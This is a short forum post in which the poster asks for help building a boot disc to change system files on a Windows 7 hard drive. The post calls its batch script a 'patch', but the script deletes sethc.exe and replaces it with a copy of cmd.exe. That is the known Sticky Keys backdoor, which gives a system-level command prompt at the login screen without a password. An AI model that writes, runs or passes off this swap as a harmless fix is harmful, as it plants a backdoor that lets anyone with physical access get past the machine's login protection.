Creating Boot Disc; Edit Files on HD

The goal is to create a boot disc that will basically use a bootable program to copy, rename and otherwise change files on the main hard drive. Normally I would personally download a file editor that can boot from a CD, but I want to be able to write the commands, and have it run when [INSERT KEY] is pressed.

The means of this is a simple patch for Windows 7 that requires the renaming of a system file in use. If I was to put this into a command prompt it would look like this (in simple terms):

Code
@echo off
echo Instructions, hello world, etc., etc.
echo.
pause

cd C:/Windows/system32
DEL sethc.exe
COPY cmd.exe sethc.exe
exit

Leeched? I was only trying to get some help. I mean, I didn't know starting a topic was a problem.
